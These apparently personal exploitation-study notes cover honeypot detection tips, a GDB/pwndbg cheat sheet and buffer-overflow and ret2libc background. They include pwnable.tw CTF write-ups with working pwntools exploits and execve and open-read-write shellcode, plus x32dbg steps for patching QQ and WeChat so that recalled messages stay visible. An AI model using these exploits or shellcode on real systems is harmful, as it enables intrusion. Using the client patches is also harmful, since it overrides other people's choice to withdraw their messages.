
Common problems compiled from the last few days of testing honeypots

  1. Some version information is missing from nmap scan results
  2. While being scanned, some of the honeypot's services become unstable: lag, ports reported as filtered, web services returning 5xx status codes
  3. The host operating system conflicts with the services it runs, e.g. a Linux host running an mssql service
  4. The honeypot may accept any password at login
  5. Banners on some ports give it away, e.g. "Tanner Server"; some web services even expose the honeypot's configuration page
  6. Someone lazily reuses another person's honeypot as-is, so hints may be left behind in the page source
  7. After logging in over ssh or telnet, some commands misbehave, e.g.: cat can only read specific files; a file created with touch is not visible from another terminal; common commands such as locate and find are missing; vi cannot open files; compound commands fail, e.g. echo 123 works but echo 123 > tmp does not

QQ

  1. Run QQ, open x32dbg and attach to the QQ.exe process
  2. Find im.dll in the Symbols panel and enter it
  3. Search for the string: bytes_reserved
  4. Double-click the third string; at the address just before the entry, modify the assembly instruction so that it goes straight to the test eax,eax instruction
  5. Search for the string: bytes_userdef
  6. Double-click the string referenced by the push statement; modify the assembly instruction at the entry so that it goes straight to the test eax,eax instruction
  7. Patch and replace the dll

Tips: the bytes_reserved string handles recall of private messages; the bytes_userdef string handles recall of group messages.

WeChat

  1. Start WeChat, open x32dbg and attach to the WeChat process
  2. Find WeChatWin.dll in the Symbols panel and enter it
  3. Search for the string: revokemsg (push wechatwin.xxx)
  4. NOP out the first call instruction below the current position (Binary -> Fill with NOPs)
  5. Patch and replace the dll

GDB

  1. backtrace, abbreviated bt: shows the function call stack of the current process.

  2. list, abbreviated l: lists the source code of the current frame, which helps locate problems; the source must be available.

    • list 38 //show the 10 lines around line 38
    • list 1,10 //show lines 1-10
    • list main //show the first 10 lines of main
  3. break, abbreviated b: set a breakpoint.

    • b *(0x123456) //common: break on the instruction at address 0x123456
      • b *rebase(0x123456) //rebase adds the program's random base address when debugging a PIE binary
    • b fun_name //common: break on function fun_name; the target must keep its symbols
      • b file_name:fun_name
    • b file_name:15 //break on line 15 of file_name; source required
      • b 15
    • b +0x10 //break 0x10 past the position where the program is currently stopped; -0x10 likewise means 0x10 before it
    • break fun if $rdi==5 //conditional breakpoint: stop only when rdi equals 5
  4. View, delete, disable breakpoints

    • use info break (abbreviated i b) to see breakpoint numbers
    • delete 5 //common: delete breakpoint 5
    • disable 5 //common: disable breakpoint 5
    • enable 5 //enable breakpoint 5
    • clear //remove all breakpoints at the current location
  5. Step into, step over, continue, run

    • s //single-step into: on a call, follows into the callee; equivalent to step into, one source-level step
      • si //common: same as s but one assembly-level step
    • n //single-step over: does not follow calls; equivalent to step over, one source-level step
      • ni //common: same as n but one assembly-level step
    • c //continue, common: run to the next breakpoint, or to the end if there is none
    • r //run, common: restart execution from the beginning
  6. Enter key: repeats the previous command.

  7. print, abbreviated p: prints the value of an expression or variable; appending /format to print formats the output. /format is a gdb format letter; useful ones are x: hexadecimal; c: character; a: address

    • p/x p/a p/b p/s …
    • p fun_name //print the address of fun_name; symbols required
    • p 0x10-0x08 //evaluate 0x10-0x08
    • p &a //show the address of variable a
    • p *(0x123456) //show the value at address 0x123456; note the difference from x, which takes the address without an asterisk
    • p $rdi //show the value of the rdi register; unlike x, this shows rdi itself, not what rdi points to
      • p *($rdi) //show the value rdi points to
  8. print-object, abbreviated po: prints Objective-C objects. It works by sending the debugDescription message to the object, much like the familiar description message.

  9. x command, format: x/nfu address or x/nfu $rdi. nfu are three parameters.

    • n is how many units to display (not how many bytes; the u that follows sets the bytes per unit) and goes right after '/'
    • u is the bytes per unit: b (one byte), h (two bytes), w (four bytes), g (eight bytes)
    • f is the display format; f and u can be given in either order, and you may give only one of them or omit n, so the syntax is quite flexible.
      Format letters (f):
      x display in hexadecimal
      d display in decimal
      u display as an unsigned integer in hexadecimal
      o display in octal
      t display in binary
      a display as an address in hexadecimal
      c display as a character
      f display as a floating-point number
      s display as a string
      b display as a character
      i display as assembly instructions
  10. set command: sets the value of a variable.

    • set $rdi=0x10 //set the rdi register to 0x10
    • set *(0x123456)=0x10 //set the value at address 0x123456 to 0x10; note the asterisk
    • set args "abc" "def" "gh" //set program arguments 1, 2 and 3
      • set args "python -c 'print "1234\x7f\xde"'" //use python to pass non-printable characters as an argument
  11. info command: shows information about memory addresses.

    • i b //common: info break, lists all breakpoints (number, location)
    • i r //common: info registers, shows the current value of every register
    • i f //info functions, lists all function names; symbols required
  12. show command: displays GDB-related information.

    • show args //show the program arguments
  13. q: quit

  14. Memory breakpoints, watch:

    • watch 0x123456 //break when the data at address 0x123456 changes
    • watch a //break when variable a changes
    • info watchpoints //show watchpoint information
  15. Catchpoints, catch:

    • catch syscall //break whenever a system call is made
    • tcatch syscall //same, but only breaks once
    • info break //catchpoints can also be seen with i b
      Besides syscall, the following events can be caught:
      1) throw: an exception is thrown
      2) catch: an exception is caught
      3) exec: exec is called
      4) fork: fork is called
      5) vfork: vfork is called
      6) load: a shared library is loaded
      7) load libname: the shared library libname is loaded
      8) unload: a shared library is unloaded
      9) unload libname: the shared library libname is unloaded
      10) syscall [args]: a system call is made; args can give a syscall number or name
  16. disass address: show the assembly instructions around an address

  17. Searching for data

    • search rdi //search forward from the current position for instructions containing rdi; returns several matches
    • search -h //show the help for search
    • find "hello" //search for the string hello; pwndbg only
    • ropgadget //search for ROP gadgets; pwndbg only
  18. Heap commands (pwndbg plugin only)

    • arena //detailed information about the arena
      • arenas //basic information about all arenas
      • arenainfo //nicely formatted information about all arenas
    • bins //common: shows the free lists of every kind of bin
      • fastbins //just the fastbins lists
      • largebins //likewise, just the largebins lists
      • smallbins //likewise, just the smallbins lists
      • unsortedbin //likewise, just the unsortedbin list
      • tcachebins //likewise, just the tcachebins lists
        • tcache //detailed tcache information
    • heap //shows all chunks as data structures
      • heapbase //shows the start address of the heap
      • heapinfo, heapinfoall //show heap information
      • parseheap //shows the heap layout; very useful
    • tracemalloc //useful: traces every place that operates on the heap
  19. cyclic num //generate num characters of a cyclic pattern for overflow testing

  20. $rebase //address offset when PIE is enabled

    • b *$rebase(0x123456) //break at 0x123456 in a PIE binary
    • codebase //print the PIE base; unlike rebase, this prints it, whereas rebase uses it
  21. stack //view the stack

    • retaddr //print the stack addresses that hold return addresses
  22. canary //show the canary value directly

  23. plt //view the plt table

  24. got //view the got table

  25. hexdump //show data the way IDA does, with the string column
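The n/f/u rules of the x command (item 9) are easiest to see on a fixed buffer. This is an added example, not from the original notes: it models gdb's integer x/nfu formats over a constructed stack image, so that x/8xb and x/2xw on the same bytes show the little-endian grouping (the s, i and f formats are left out). Function names, STACK and STACK_BASE are my own.

```python
import struct

# Added example (not part of the original notes): a small model of gdb's
# x/nfu command, run over a constructed byte buffer so the n/f/u rules and
# the little-endian grouping can be seen without a live debugger.

UNIT_SIZE = {"b": 1, "h": 2, "w": 4, "g": 8}
FORMATS = set("xduotac")   # integer formats only; s, i, f are not modelled


def parse_x_spec(spec):
    """Parse the 'nfu' part of x/nfu.  n is the leading digit run (default 1);
    f and u may follow in either order and either may be omitted
    (defaults: hex and 4-byte words, as in a fresh gdb session)."""
    i = 0
    while i < len(spec) and spec[i].isdigit():
        i += 1
    count = int(spec[:i]) if i else 1
    fmt, unit = "x", "w"
    for ch in spec[i:]:
        if ch in UNIT_SIZE:
            unit = ch
        elif ch in FORMATS:
            fmt = ch
        else:
            raise ValueError("unknown x/ specifier: %r" % ch)
    return count, fmt, unit


def format_unit(value, fmt, size):
    """Render one unit (an unsigned integer of `size` bytes) in gdb's style."""
    bits = 8 * size
    if fmt == "x":
        return "0x%0*x" % (size * 2, value)
    if fmt == "d":   # two's-complement signed view of the same bytes
        return str(value - (1 << bits) if value >> (bits - 1) else value)
    if fmt == "u":
        return str(value)
    if fmt == "o":
        return "0%o" % value
    if fmt == "t":
        return format(value, "0%db" % bits)
    if fmt == "a":
        return hex(value)
    if fmt == "c":   # gdb prints the number followed by the character
        return "%d %r" % (value & 0xFF, chr(value & 0xFF))
    raise ValueError(fmt)


def examine(memory, base, addr, spec):
    """Model of `x/<spec> addr` over a buffer `memory` mapped at `base`.
    Returns the rendered units; raises if the read would leave the buffer,
    which is gdb's "Cannot access memory" case."""
    count, fmt, unit = parse_x_spec(spec)
    size = UNIT_SIZE[unit]
    start = addr - base
    if start < 0 or start + count * size > len(memory):
        raise ValueError("cannot access memory at 0x%x" % addr)
    out = []
    for k in range(count):
        chunk = memory[start + k * size:start + (k + 1) * size]
        out.append(format_unit(int.from_bytes(chunk, "little"), fmt, size))
    return out


# Constructed sample: a stack slot holding "/bin/sh\0" followed by the
# 32-bit value 0x08048087 (the return address used in the Start write-up).
STACK_BASE = 0xFFFFD000
STACK = b"/bin/sh\0" + struct.pack("<I", 0x08048087)

if __name__ == "__main__":
    # Same bytes, three views: 8 single bytes, 2 words, then the word at +8.
    print(examine(STACK, STACK_BASE, STACK_BASE, "8xb"))
    print(examine(STACK, STACK_BASE, STACK_BASE, "2xw"))
    print(examine(STACK, STACK_BASE, STACK_BASE + 8, "xw"))
```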

Reference links

Flag

Aim to solve one challenge a week

Start

add     esp, 14h

This shows that before returning from its first run the program discards the string 'Let's start the CTF:' it pushed earlier, so we can overwrite the return address with 0x08048087; that runs sys_write once more, and this time the output is the address of esp.

.text:08048087 01C                 mov     ecx, esp        ; addr
.text:08048089 01C                 mov     dl, 14h         ; len
.text:0804808B 01C                 mov     bl, 1           ; fd: 0 (stdin), 1 (stdout), 2 (stderr)
.text:0804808D 01C                 mov     al, 4
.text:0804808F 01C                 int     80h             ; LINUX - sys_write

Write the shellcode and build the payload

The final code is as follows

from pwn import *

context.arch = 'i386'


def leak_esp(r):
    # Overwrite the return address with 0x08048087 (the mov ecx, esp ... sys_write
    # block) so the program writes 0x14 bytes starting at esp back to us.
    address_1 = p32(0x08048087)
    payload = b'a' * 20 + address_1
    print(r.recvuntil(b'CTF:'))
    r.send(payload)
    esp = u32(r.recv()[:4])
    print("Address of ESP: ", hex(esp))
    return esp


# eax = 0xb: sys_execve
# ebx: file to execute
# ecx: command line parameters
# edx: environment block
# int 0x80: Linux system call
shellcode = asm('\n'.join([
    'push %d' % u32(b'/sh\0'),
    'push %d' % u32(b'/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',
]))


if __name__ == "__main__":
    local = 0
    if local:
        r = process('./start')
    else:
        r = remote('chall.pwnable.tw', 10000)

    esp = leak_esp(r)
    # Without the +20, typing a command in the shell obtained gives SIGSEGV and
    # the shell exits (probably a stack imbalance)
    payload = b"A" * 20 + p32(esp + 20) + shellcode
    r.send(payload)
    r.interactive()

orw

This challenge asks for shellcode that reads the contents of "/home/orw/flag"; the hint says only the open, read and write system calls are allowed. This is enforced through orw_seccomp(). seccomp (short for secure computing mode) is a security facility in the Linux kernel that puts a process into a "secure" execution mode in which it may only make four system calls, read(), write(), exit() and sigreturn(); any other call terminates the process.

Following the Linux Syscall Reference, write the assembly and assemble it with pwntools.

from pwn import *


# p = process('./orw')
p = remote('chall.pwnable.tw', 10001)
shellcode = b""


# open(file, 0, 0): O_RDONLY is zero
# /home/orw/flag in hex is 2f686f6d652f6f72772f666c6167, i.e. the data pushed onto the stack;
# if the short last chunk bothers you, pad with leading slashes or trailing zeros instead

shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x6761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f; mov ebx,esp;xor edx,edx;int 0x80;')

# padded with leading slashes:
#shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; push 0x2f77726f; push 0x2f656d6f; push 0x682f2f2f; mov ebx,esp;xor edx,edx;int 0x80;')
# padded with trailing zeros:
#shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x00006761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f; mov ebx,esp;xor edx,edx;int 0x80;')


# read(3, file, 0x30): with ebx/fd set to 0, 1 or 2 there is no output here, so use the lowest
# unused fd, 3; 0, 1 and 2 are already taken by Linux, and fds a program opens normally start at 3.
shellcode += asm('mov eax,0x03;mov ecx,ebx;mov ebx,0x3;mov edx,0x30;int 0x80;')

# write(1, file, 0x30)
shellcode += asm('mov eax,0x04;mov ebx,0x1;int 0x80;')

p.recvuntil(b'Give my your shellcode:')
p.send(shellcode)
p.interactive()
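The push immediates in both shellcodes above are just the path cut into 4-byte little-endian words and pushed tail-first. This added example (not the write-up's own code; all function names are mine) derives them from a path with the three padding choices mentioned in the comments, and decodes a push sequence back to the string at esp, which is the check an analyst does when reading unfamiliar shellcode.

```python
import struct

# Added example, not from the write-up: derive the `push` immediates that place
# a NUL-terminated path at esp, and decode such a sequence back to the string.


def chunks_for_push(path, pad="none"):
    """Return the 32-bit immediates that, pushed in this order after a
    `push ecx` with ecx == 0, leave `path` NUL-terminated at esp.
    pad="none":  the last chunk is short; the assembler still emits a 32-bit
                 push, so its upper bytes are zero (as in the orw shellcode)
    pad="slash": prepend '/' so the length is a multiple of 4 (same path)
    pad="zero":  append NUL bytes so the length is a multiple of 4"""
    raw = path.encode()
    if pad == "slash":
        raw = b"/" * (-len(raw) % 4) + raw
    elif pad == "zero":
        raw += b"\0" * (-len(raw) % 4)
    elif pad != "none":
        raise ValueError("unknown padding %r" % pad)
    pieces = [raw[i:i + 4] for i in range(0, len(raw), 4)]
    # The stack grows down, so the tail of the string is pushed first.
    return [int.from_bytes(p, "little") for p in reversed(pieces)]


def as_asm(imms):
    """Render the immediates in the write-up's `push 0x...;` style."""
    return "".join("push 0x%x; " % v for v in imms)


def string_at_esp(imms):
    """Decode: emulate `push ecx` (ecx == 0) followed by the pushes, then read
    the C string the kernel would see at esp (bytes up to the first NUL)."""
    stack = b"\0" * 4
    for v in imms:
        if not 0 <= v <= 0xFFFFFFFF:
            raise ValueError("push immediate does not fit in 32 bits: %#x" % v)
        stack = struct.pack("<I", v) + stack
    return stack[:stack.index(b"\0")].decode()


if __name__ == "__main__":
    for path in ("/bin/sh", "/home/orw/flag"):
        for pad in ("none", "slash", "zero"):
            imms = chunks_for_push(path, pad)
            print("%-15s %-5s %s-> %r" % (path, pad, as_asm(imms), string_at_esp(imms)))
```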

Buffer Overflow

The program does no length check on a buffer, so an attacker can supply an overly long string that overwrites other data and, in serious cases, hijacks control flow

Classified by where the buffer lives: stack based, data based, heap based

stack base

To be added

data base

  • Vulnerable functions
    • gets
    • scanf
    • strcpy
    • sprintf
    • memcpy
    • strcat
    • … (anything without a length check)

From crash to exploit

Overwrite the return address

Intel 80x86 is little-endian (low byte at the low address); use p32, or write the bytes in reverse order
PowerPC processors are big-endian

  • Return to Text
    1. Locate the overflow offset
      • cyclic
        • in pwntools, cyclic(num) & cyclic("str")
      • gdb pattern_create & crashoff
    2. Redirect eip to code already in the program
      • find function addresses with objdump
      • IDA
    3. Exploitation
      • Debug the exploit
        • attach
  • Return to Shellcode
    • the data segment is executable and at a fixed address: write shellcode into the data segment and jump to it

heap base

To be added

Protection

ASLR

Address space layout randomization

Every time the program runs, the stack, heap and library locations change

  • Check whether ASLR is enabled
    • cat /proc/sys/kernel/randomize_va_space

DEP (NX)

Writable memory is not executable; executable memory is not writable

PIE (Position Independent Executable)

When enabled, the data and code segments are randomized by ASLR too

StackGuard (canary)

A random value generated when the program starts and placed on the stack; on function return it is checked, and if it has changed the program is terminated

  • Usually kept in the tcbhead_t structure of the TLS segment; on x86/x64 a register points to that structure and the program reads the field through it
    • x86: gs
    • x64: fs

RELRO

  • Disabled
    • both .got and .got.plt are writable
  • Partial (default)
    • .got is read-only
  • Full
    • under full RELRO, all functions are resolved at load time and the table then becomes read-only
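The protections listed above are recorded in the ELF headers themselves. This added example (not from the notes; the function names and the constructed sample images are mine) reads NX from PT_GNU_STACK, PIE from e_type and the RELRO level from PT_GNU_RELRO plus DT_BIND_NOW/DF_BIND_NOW, for both ELF32 and ELF64, and builds minimal sample images so the checks can be run offline. Canary detection needs the symbol table and is left out.

```python
import struct

# Added example (not from the original notes): a small pure-Python "checksec"
# that reads the protections discussed above from the ELF headers themselves.
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, ET_DYN = 2, 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 0x8


def read_headers(data):
    """Return (is64, e_type, program headers) of a little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("not a little-endian ELF image")
    is64 = data[4] == 2
    e_type = struct.unpack_from("<H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:  # Elf64_Phdr stores p_flags second, Elf32_Phdr stores it seventh
            p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from("<IIQQQQQQ", data, off)
        else:
            p_type, p_offset, _, _, p_filesz, _, p_flags, _ = struct.unpack_from("<IIIIIIII", data, off)
        phdrs.append({"type": p_type, "flags": p_flags, "offset": p_offset, "filesz": p_filesz})
    return is64, e_type, phdrs


def dynamic_tags(data, is64, phdrs):
    """Collect d_tag -> d_val from the PT_DYNAMIC segment, up to DT_NULL."""
    fmt = "<qQ" if is64 else "<iI"
    step = struct.calcsize(fmt)
    tags = {}
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        off, end = ph["offset"], ph["offset"] + ph["filesz"]
        while off + step <= end:
            tag, val = struct.unpack_from(fmt, data, off)
            if tag == DT_NULL:
                break
            tags[tag] = val
            off += step
    return tags


def checksec(data):
    """NX: a PT_GNU_STACK without PF_X (no PT_GNU_STACK at all is reported as
    NX off).  PIE: e_type == ET_DYN.  RELRO: PT_GNU_RELRO present -> Partial,
    plus DT_BIND_NOW or DF_BIND_NOW in the dynamic section -> Full.
    Canary would need the symbol table (__stack_chk_fail) and is not checked."""
    is64, e_type, phdrs = read_headers(data)
    tags = dynamic_tags(data, is64, phdrs)
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    relro_seg = any(p["type"] == PT_GNU_RELRO for p in phdrs)
    bind_now = DT_BIND_NOW in tags or bool(tags.get(DT_FLAGS, 0) & DF_BIND_NOW)
    relro = "Full" if relro_seg and bind_now else "Partial" if relro_seg else "Disabled"
    return {"NX": nx, "PIE": e_type == ET_DYN, "RELRO": relro}


def build_sample_elf(pie, nx, relro, bind_now, is64=True):
    """Constructed minimal ELF (headers and dynamic section only; it does not
    run) carrying the requested protection flags, for testing checksec offline."""
    dyn_fmt, ph_fmt, eh_size = ("<qQ", "<IIQQQQQQ", 64) if is64 else ("<iI", "<IIIIIIII", 52)
    ph_size = struct.calcsize(ph_fmt)
    dyn = struct.pack(dyn_fmt, DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack(dyn_fmt, DT_NULL, 0)
    n_ph = 3 if relro else 2
    dyn_off = eh_size + ph_size * n_ph

    def phdr(p_type, flags, off=0, size=0):
        if is64:
            return struct.pack(ph_fmt, p_type, flags, off, 0, 0, size, size, 0)
        return struct.pack(ph_fmt, p_type, off, 0, 0, size, size, flags, 0)

    body = phdr(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X))
    body += phdr(PT_DYNAMIC, PF_R | PF_W, dyn_off, len(dyn))
    if relro:
        body += phdr(PT_GNU_RELRO, PF_R)
    e_type = ET_DYN if pie else ET_EXEC
    ident = b"\x7fELF" + bytes([2 if is64 else 1, 1, 1]) + b"\0" * 9  # class, LE, version 1
    if is64:  # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags, then sizes/counts
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, eh_size, 0, 0, eh_size, ph_size, n_ph, 64, 0, 0)
    else:
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, eh_size, 0, 0, eh_size, ph_size, n_ph, 40, 0, 0)
    return ehdr + body + dyn


if __name__ == "__main__":
    import sys
    # Give a real binary's path to check it; with no argument a constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(True, True, True, True)
    print(checksec(data))
```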

Lazy binding

Some library functions of a dynamically linked program may never be called before it exits, so ELF uses lazy binding: the real address of a library function is looked up and bound only the first time it is called

  • GOT (Global Offset Table)
    • An array of function pointers holding the addresses of functions in other libraries. Because of lazy binding the correct address is not filled in at the start; instead the entry holds the address of a piece of plt code, and only when the library function is actually called is the function looked up, after which its real address is written into the GOT
    • Split into .got (references to global variables) & .got.plt (references to functions)
    • The first three entries of .got.plt
      • address of .dynamic
      • link_map (a linked list of the libraries referenced)
      • dl_runtime_resolve (the function that looks up function addresses)
    • Finding the got
      • objdump -R elf or readelf -r elf
    • To implement lazy binding the got must be writable, so if the program has an arbitrary write vulnerability, the got can be overwritten to change control flow

Return to Library

Background

  • Programs rarely contain functions such as system that directly give a shell, and under DEP/NX you cannot simply drop in shellcode and execute it
  • Dynamically linked programs mostly load libc, and libc has functions that serve our purpose
    • system
    • execve
  • ASLR is normally enabled, so the libc load address differs on every run; an information leak is usually needed to obtain libc's base address, from which the address of system etc. is computed before redirecting the program there

Obtaining libc's address

  • got
  • leftover values on the stack
    • the stack contents are not cleared after a function returns
  • leftover values on the heap
    • memory freed and then malloc'd again is not cleared either

Obtaining a function's offset within libc

  • objdump -T libc.so.6 | grep function
  • search in IDA

Approach

  1. Obtain the address of any libc function
  2. Subtract that function's offset within libc to get libc_base_address
    • identify the libc version via vmmap, ldd, information leaks, etc.
  3. Add system's offset within libc to libc_base_address to get system's address
    • between system and sh a value must be inserted to stand in for the return address, e.g.

payload = p32(system_addr) + p32(0xdeadbeef) + p32(sh_addr)

reference

# Name eax ebx ecx edx esi edi ebp Definition
0 restart_syscall 0x00 - - - - - - kernel/signal.c:2501
1 exit 0x01 int error_code - - - - - kernel/exit.c:1095
2 fork 0x02 - - - - - - arch/x86/kernel/process.c:271
3 read 0x03 unsigned int fd char *buf size_t count - - - fs/read_write.c:460
4 write 0x04 unsigned int fd const char *buf size_t count - - - fs/read_write.c:477
5 open 0x05 const char *filename int flags umode_t mode - - - fs/open.c:1046
6 close 0x06 unsigned int fd - - - - - fs/open.c:1117
7 waitpid 0x07 pid_t pid int *stat_addr int options - - - kernel/exit.c:1879
8 creat 0x08 const char *pathname umode_t mode - - - - fs/open.c:1079
9 link 0x09 const char *oldname const char *newname - - - - fs/namei.c:3152
10 unlink 0x0a const char *pathname - - - - - fs/namei.c:2979
11 execve 0x0b const char *name const char *const *argv const char *const *envp - - - arch/x86/kernel/process.c:342
12 chdir 0x0c const char *filename - - - - - fs/open.c:375
13 time 0x0d time_t *tloc - - - - - kernel/time.c:62
14 mknod 0x0e const char *filename umode_t mode unsigned dev - - - fs/namei.c:2693
15 chmod 0x0f const char *filename umode_t mode - - - - fs/open.c:499
16 lchown 0x10 const char *filename uid_t user gid_t group - - - fs/open.c:586
17 break - - - - - - - Not implemented
18 oldstat 0x12 const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:155
19 lseek 0x13 unsigned int fd off_t offset unsigned int origin - - - fs/read_write.c:230
20 getpid 0x14 - - - - - - kernel/timer.c:1413
21 mount 0x15 char *dev_name char *dir_name char *type unsigned long flags void *data - fs/namespace.c:2362
22 umount 0x16 char *name int flags - - - - fs/namespace.c:1190
23 setuid 0x17 uid_t uid - - - - - kernel/sys.c:761
24 getuid 0x18 - - - - - - kernel/timer.c:1435
25 stime 0x19 time_t *tptr - - - - - kernel/time.c:81
26 ptrace 0x1a long request long pid unsigned long addr unsigned long data - - kernel/ptrace.c:857
27 alarm 0x1b unsigned int seconds - - - - - kernel/timer.c:1390
28 oldfstat 0x1c unsigned int fd struct __old_kernel_stat *statbuf - - - - fs/stat.c:181
29 pause 0x1d - - - - - - kernel/signal.c:3245
30 utime 0x1e char *filename struct utimbuf *times - - - - fs/utimes.c:27
31 stty - - - - - - - Not implemented
32 gtty - - - - - - - Not implemented
33 access 0x21 const char *filename int mode - - - - fs/open.c:370
34 nice 0x22 int increment - - - - - kernel/sched/core.c:4119
35 ftime - - - - - - - Not implemented
36 sync 0x24 - - - - - - fs/sync.c:98
37 kill 0x25 pid_t pid int sig - - - - kernel/signal.c:2841
38 rename 0x26 const char *oldname const char *newname - - - - fs/namei.c:3403
39 mkdir 0x27 const char *pathname umode_t mode - - - - fs/namei.c:2751
40 rmdir 0x28 const char *pathname - - - - - fs/namei.c:2870
41 dup 0x29 unsigned int fildes - - - - - fs/fcntl.c:131
42 pipe 0x2a int *fildes - - - - - fs/pipe.c:1149
43 times 0x2b struct tms *tbuf - - - - - kernel/sys.c:1058
44 prof - - - - - - - Not implemented
45 brk 0x2d unsigned long brk - - - - - mm/mmap.c:246
46 setgid 0x2e gid_t gid - - - - - kernel/sys.c:614
47 getgid 0x2f - - - - - - kernel/timer.c:1447
48 signal 0x30 int sig __sighandler_t handler - - - - kernel/signal.c:3228
49 geteuid 0x31 - - - - - - kernel/timer.c:1441
50 getegid 0x32 - - - - - - kernel/timer.c:1453
51 acct 0x33 const char *name - - - - - kernel/acct.c:255
52 umount2 0x34 char *name int flags - - - - fs/namespace.c:1190
53 lock - - - - - - - Not implemented
54 ioctl 0x36 unsigned int fd unsigned int cmd unsigned long arg - - - fs/ioctl.c:604
55 fcntl 0x37 unsigned int fd unsigned int cmd unsigned long arg - - - fs/fcntl.c:442
56 mpx - - - - - - - Not implemented
57 setpgid 0x39 pid_t pid pid_t pgid - - - - kernel/sys.c:1083
58 ulimit - - - - - - - Not implemented
59 oldolduname 0x3b struct oldold_utsname *name - - - - - kernel/sys.c:1330
60 umask 0x3c int mask - - - - - kernel/sys.c:1782
61 chroot 0x3d const char *filename - - - - - fs/open.c:422
62 ustat 0x3e unsigned dev struct ustat *ubuf - - - - fs/statfs.c:222
63 dup2 0x3f unsigned int oldfd unsigned int newfd - - - - fs/fcntl.c:116
64 getppid 0x40 - - - - - - kernel/timer.c:1424
65 getpgrp 0x41 - - - - - - kernel/sys.c:1184
66 setsid 0x42 - - - - - - kernel/sys.c:1219
67 sigaction 0x43 int sig const struct old_sigaction *act struct old_sigaction *oact - - - arch/x86/kernel/signal.c:487
68 sgetmask 0x44 - - - - - - kernel/signal.c:3207
69 ssetmask 0x45 int newmask - - - - - kernel/signal.c:3213
70 setreuid 0x46 uid_t ruid uid_t euid - - - - kernel/sys.c:690
71 setregid 0x47 gid_t rgid gid_t egid - - - - kernel/sys.c:557
72 sigsuspend 0x48 int history0 int history1 old_sigset_t mask - - - arch/x86/kernel/signal.c:479
73 sigpending 0x49 old_sigset_t *set - - - - - kernel/signal.c:3107
74 sethostname 0x4a char *name int len - - - - kernel/sys.c:1365
75 setrlimit 0x4b unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1641
76 getrlimit 0x4c unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1440
77 getrusage 0x4d int who struct rusage *ru - - - - kernel/sys.c:1774
78 gettimeofday 0x4e struct timeval *tv struct timezone *tz - - - - kernel/time.c:101
79 settimeofday 0x4f struct timeval *tv struct timezone *tz - - - - kernel/time.c:179
80 getgroups 0x50 int gidsetsize gid_t *grouplist - - - - kernel/groups.c:202
81 setgroups 0x51 int gidsetsize gid_t *grouplist - - - - kernel/groups.c:231
82 select 0x52 int n fd_set *inp fd_set *outp fd_set *exp struct timeval *tvp - fs/select.c:593
83 symlink 0x53 const char *oldname const char *newname - - - - fs/namei.c:3039
84 oldlstat 0x54 const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:168
85 readlink 0x55 const char *path char *buf int bufsiz - - - fs/stat.c:321
86 uselib 0x56 const char *library - - - - - fs/exec.c:116
87 swapon 0x57 const char *specialfile int swap_flags - - - - mm/swapfile.c:1996
88 reboot 0x58 int magic1 int magic2 unsigned int cmd void *arg - - kernel/sys.c:432
89 readdir 0x59 unsigned int fd struct old_linux_dirent *dirent unsigned int count - - - fs/readdir.c:105
90 mmap 0x5a unsigned long addr unsigned long len unsigned long prot unsigned long flags unsigned long fd unsigned long off arch/x86/kernel/sys_x86_64.c:84
91 munmap 0x5b unsigned long addr size_t len - - - - mm/mmap.c:2141
92 truncate 0x5c const char *path long length - - - - fs/open.c:128
93 ftruncate 0x5d unsigned int fd unsigned long length - - - - fs/open.c:178
94 fchmod 0x5e unsigned int fd umode_t mode - - - - fs/open.c:472
95 fchown 0x5f unsigned int fd uid_t user gid_t group - - - fs/open.c:605
96 getpriority 0x60 int which int who - - - - kernel/sys.c:241
97 setpriority 0x61 int which int who int niceval - - - kernel/sys.c:172
98 profil - - - - - - - Not implemented
99 statfs 0x63 const char *pathname struct statfs *buf - - - - fs/statfs.c:166
100 fstatfs 0x64 unsigned int fd struct statfs *buf - - - - fs/statfs.c:187
101 ioperm 0x65 unsigned long from unsigned long num int turn_on - - - arch/x86/kernel/ioport.c:23
102 socketcall 0x66 int call unsigned long *args - - - - net/socket.c:2355
103 syslog 0x67 int type char *buf int len - - - kernel/printk.c:1195
104 setitimer 0x68 int which struct itimerval *value struct itimerval *ovalue - - - kernel/itimer.c:278
105 getitimer 0x69 int which struct itimerval *value - - - - kernel/itimer.c:103
106 stat 0x6a const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:155
107 lstat 0x6b const char *filename struct __old_kernel_stat *statbuf - - - - fs/stat.c:168
108 fstat 0x6c unsigned int fd struct __old_kernel_stat *statbuf - - - - fs/stat.c:181
